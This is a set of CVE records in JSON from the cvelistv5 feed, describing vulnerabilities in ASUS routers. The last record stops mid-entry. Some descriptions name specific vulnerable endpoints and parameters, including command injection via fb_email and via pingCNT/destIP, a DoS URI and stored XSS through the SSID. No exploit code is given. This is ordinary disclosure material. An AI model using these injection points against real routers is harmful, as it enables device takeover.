{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:58:19.040Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://starlabs.sg/advisories/18-20333/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-03-20T00:11:15", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://starlabs.sg/advisories/18-20333/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-20333", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://starlabs.sg/advisories/18-20333/", "refsource": "MISC", "url": "https://starlabs.sg/advisories/18-20333/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-20333", "datePublished": "2020-03-20T00:11:15", "dateReserved": "2018-12-21T00:00:00", "dateUpdated": "2024-08-05T11:58:19.040Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-20335
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://starlabs.sg/advisories/18-20335/ | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:58:18.948Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://starlabs.sg/advisories/18-20335/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-03-20T00:11:08", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://starlabs.sg/advisories/18-20335/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-20335", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://starlabs.sg/advisories/18-20335/", "refsource": "MISC", "url": "https://starlabs.sg/advisories/18-20335/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-20335", "datePublished": "2020-03-20T00:11:09", "dateReserved": "2018-12-21T00:00:00", "dateUpdated": "2024-08-05T11:58:18.948Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-4937
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://reviews.cnet.com/8301-3132_7-57594003-98 | x_refsource_MISC | |
http://twitter.com/ASUSUSA/statuses/357612236392509440 | x_refsource_CONFIRM |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:59:40.986Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2013-07-26T10:00:00Z", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-4937", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://reviews.cnet.com/8301-3132_7-57594003-98", "refsource": "MISC", "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "name": "http://twitter.com/ASUSUSA/statuses/357612236392509440", "refsource": "CONFIRM", "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-4937", "datePublished": "2013-07-26T10:00:00Z", "dateReserved": "2013-07-26T00:00:00Z", "dateUpdated": "2024-09-17T02:46:42.662Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-3093
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.securityfocus.com/archive/1/531194 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:00:09.628Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.securityfocus.com/archive/1/531194" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-03-29T00:00:00", "descriptions": [ { "lang": "en", "value": "ASUS RT-N56U devices allow CSRF." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-01-28T20:13:17", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.securityfocus.com/archive/1/531194" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-3093", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "ASUS RT-N56U devices allow CSRF." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.securityfocus.com/archive/1/531194", "refsource": "MISC", "url": "https://www.securityfocus.com/archive/1/531194" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-3093", "datePublished": "2020-01-28T20:13:17", "dateReserved": "2013-04-17T00:00:00", "dateUpdated": "2024-08-06T16:00:09.628Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-43702
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:03:08.643Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-07-05T11:50:03", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-43702", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/", "refsource": "MISC", "url": "https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/" }, { "name": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch", "refsource": "MISC", "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-43702", "datePublished": "2022-07-05T11:50:03", "dateReserved": "2021-11-15T00:00:00", "dateUpdated": "2024-08-04T04:03:08.643Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-20334
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://starlabs.sg/advisories/18-20334/ | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:58:18.926Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://starlabs.sg/advisories/18-20334/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-03-20T00:11:06", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://starlabs.sg/advisories/18-20334/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-20334", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://starlabs.sg/advisories/18-20334/", "refsource": "MISC", "url": "https://starlabs.sg/advisories/18-20334/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-20334", "datePublished": "2020-03-20T00:11:06", "dateReserved": "2018-12-21T00:00:00", "dateUpdated": "2024-08-05T11:58:18.926Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-9285
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:17:52.082Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://fortiguard.com/zeroday/FG-VD-17-216" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2018-04-04T00:00:00", "descriptions": [ { "lang": "en", "value": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-11-13T17:06:15", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://fortiguard.com/zeroday/FG-VD-17-216" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-9285", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html", "refsource": "MISC", "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" }, { "name": "https://fortiguard.com/zeroday/FG-VD-17-216", "refsource": "MISC", "url": "https://fortiguard.com/zeroday/FG-VD-17-216" }, { "name": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-9285", "datePublished": "2018-04-04T19:00:00", "dateReserved": "2018-04-04T00:00:00", "dateUpdated": "2024-08-05T07:17:52.082Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-2718
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://seclists.org/fulldisclosure/2014/Oct/122 | mailing-list, x_refsource_FULLDISC | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/98316 | vdb-entry, x_refsource_XF | |
http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html | x_refsource_MISC | |
https://support.t-mobile.com/docs/DOC-21994 | x_refsource_CONFIRM | |
http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html | x_refsource_MISC | |
http://www.securityfocus.com/bid/70791 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:21:36.023Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "20141028 CVE-2014-2718: ASUS wireless router updates are vulnerable to a MITM attack", "tags": [ "mailing-list", "x_refsource_FULLDISC", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2014/Oct/122" }, { "name": "asus-cve20142718-mitm(98316)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html" }, { "name": "70791", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/70791" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-10-28T00:00:00", "descriptions": [ { "lang": "en", "value": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "20141028 CVE-2014-2718: ASUS wireless router updates are vulnerable to a MITM attack", "tags": [ "mailing-list", "x_refsource_FULLDISC" ], "url": "http://seclists.org/fulldisclosure/2014/Oct/122" }, { "name": "asus-cve20142718-mitm(98316)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "tags": [ "x_refsource_MISC" ], "url": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html" }, { "name": "70791", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/70791" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2014-2718", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "20141028 CVE-2014-2718: ASUS wireless router updates are vulnerable to a MITM attack", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2014/Oct/122" }, { "name": "asus-cve20142718-mitm(98316)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "name": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html" }, { "name": "https://support.t-mobile.com/docs/DOC-21994", "refsource": "CONFIRM", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "name": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html", "refsource": "MISC", "url": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html" }, { "name": "70791", "refsource": "BID", "url": "http://www.securityfocus.com/bid/70791" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2014-2718", "datePublished": "2014-11-04T22:00:00", "dateReserved": "2014-04-01T00:00:00", "dateUpdated": "2024-08-06T10:21:36.023Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-4656
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ise.io/casestudies/exploiting-soho-routers/ | x_refsource_MISC | |
https://www.ise.io/soho_service_hacks/ | x_refsource_MISC | |
https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:52:26.504Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-13T00:00:00", "descriptions": [ { "lang": "en", "value": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-11-13T14:44:05", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-4656", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ise.io/casestudies/exploiting-soho-routers/", "refsource": "MISC", "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "name": "https://www.ise.io/soho_service_hacks/", "refsource": "MISC", "url": "https://www.ise.io/soho_service_hacks/" }, { "name": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf", "refsource": "MISC", "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-4656", "datePublished": "2019-11-13T14:44:05", "dateReserved": "2013-06-24T00:00:00", "dateUpdated": "2024-08-06T16:52:26.504Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-8826
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:02:26.055Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": 